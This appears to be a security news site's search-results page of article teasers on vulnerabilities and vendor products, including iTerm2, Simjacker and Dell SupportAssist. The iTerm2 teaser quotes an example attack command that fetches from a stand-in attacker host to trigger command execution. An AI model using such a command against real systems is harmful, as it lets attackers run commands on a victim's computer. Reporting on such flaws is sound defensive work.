Search results for: vulnerability

Trend Micro and Snyk provide open source vulnerability intelligence for DevOps

Trend Micro, the global leader in cloud security, announced a strategic partnership with Snyk, the leader in developer-first open source security. The partnership will focus on solving the unrelenting challenge that open source vulnerabilities create for developers, stemming from code-reuse, public repositories and open source. Together, Trend Micro and Snyk will help businesses manage the risk of vulnerabilities without interrupting the software delivery process. The combination of open source vulnerability intelligence from Snyk and Trend … More

Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will … More

Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping

Cequence Security’s CQ Prime Threat Research Team discovered a vulnerability in Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate or list and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More

Simjacker vulnerability actively exploited to track, spy on mobile phone owners

Following extensive research, AdaptiveMobile Security has uncovered a new and previously undetected vulnerability. This vulnerability is currently being exploited and is being used for targeted surveillance of mobile phone users. The vulnerability and its associated attacks have been named Simjacker as it involves the hijacking of SIM cards and threatens mobile phone users across the globe. What does Simjacker do? Simjacker extracts the location information of mobile phone users from vulnerable operators, retrieved using malicious … More

AlertEnterprise’s Airport Guardian integration helps airports reduce vulnerability and risk

AlertEnterprise, the leading physical-logical security convergence software company, has successfully integrated its Airport Guardian software with the Federal Bureau of Investigation’s (FBI) Record of Arrest and Prosecution Background (Rap Back) service. By integrating the Rap Back service, Airport Guardian software is designed to help airports significantly reduce vulnerability and risk in vetting the security backgrounds of job applicants and employees. The integration delivers real-time and continuous criminal history record checks (CHRC) during personnel selection and … More

Securing the cloud: Visibility, compliance and vulnerability management

In this Help Net Security podcast recorded at Black Hat USA 2019, Hari Srinivasan, Director of Product Management for Qualys, talks about the basics of securing your cloud. Here’s a transcript of the podcast for your convenience. Hello and welcome to today’s podcast. A bunch of questions are being thrown again about cloud security. Is the cloud inherently secure? Isn’t it too chaotic and elastic that implementing a security strategy is really tough? My name … More

Greenbone introduces virtual appliances for vulnerability management

Greenbone, a leading provider of vulnerability analysis for IT networks, announced that its portfolio of vulnerability management (VM) products is now available via virtual appliances. Greenbone’s customers can now choose to deploy physical or virtual appliances, increasing flexibility and efficiency, while ensuring that data protection is always guaranteed. VM solutions identify and patch security-relevant vulnerabilities in IT systems, helping businesses reduce their exposure to risks and improving the overall resilience of their infrastructures. Greenbone’s entire … More

Denim Group integrates Jenkins Plugin with ThreadFix vulnerability management platform

Denim Group, the leading independent application security firm, announced the latest version of their Jenkins Plugin to integrate with their flagship vulnerability management product, ThreadFix. This plugin will allow development teams to incorporate application security testing into continuous integration and continuous delivery (CI/CD) pipelines, encouraging teams to address security concerns in a flexible manner. ThreadFix allows organizations to manage their application security programs and address risks to business operations that could be affected by vulnerabilities … More

Flexera unveils Vendor Patch Module for its Software Vulnerability Manager

Flexera, the software company that helps organizations realize technology’s power to accelerate their business, releases an add-on module for its popular Software Vulnerability Manager – Vendor Patch Module. The number of constant exploits, attacks and other software vulnerabilities has become unmanageable, and attempts to keep up can be overwhelming. Flexera Software Vulnerability Manager (SVM) was designed to identify these vulnerabilities and help prioritize remediation efforts. With the new Vendor Patch Module, organizations are able to … More

1 in 10 open source components downloaded in 2018 had a known security vulnerability

This year’s Sonatype report reveals the best practices exhibited by exemplary open source software projects and commercial application development teams. As in years past, it also examines the rapidly expanding supply and continued exponential growth in consumption of open source components. For the fifth anniversary report, Sonatype collaborated with Gene Kim from IT Revolution, and Dr. Stephen Magill from Galois and MuseDev. Together with Sonatype, the researchers objectively examined and empirically documented release patterns and … More

Dell fixes high-risk vulnerability in pre-installed SupportAssist software

Dell pushed out fixes for a high-risk vulnerability in its pre-installed SupportAssist software and urges users who don’t have auto updating enabled to upgrade the software manually. About the vulnerability (CVE-2019-12280) Dell SupportAssist software, which comes pre-installed on most Dell laptops and computers running Windows, has administrator-level access to the operating system (via a signed driver) because it must be able to identify issues, run diagnostics, driver-update scans, and install drivers. In May, researcher Bill … More

Arctic Wolf Managed Risk solution provides proactive vulnerability management services

Arctic Wolf Networks, a leading security operations center (SOC)-as-a-service company, announced the Arctic Wolf Managed Risk solution to provide proactive identification, analysis, and prevention of vulnerabilities. “Companies know that they need to reduce their attack surface, but they often don’t know where to begin. Arctic Wolf Managed Risk service helps companies make sense of their cyber risk profile, by continuously scanning internal/external networks and endpoints, and quantifying cyber risk-based vulnerabilities,” said Brian NeSmith, CEO and … More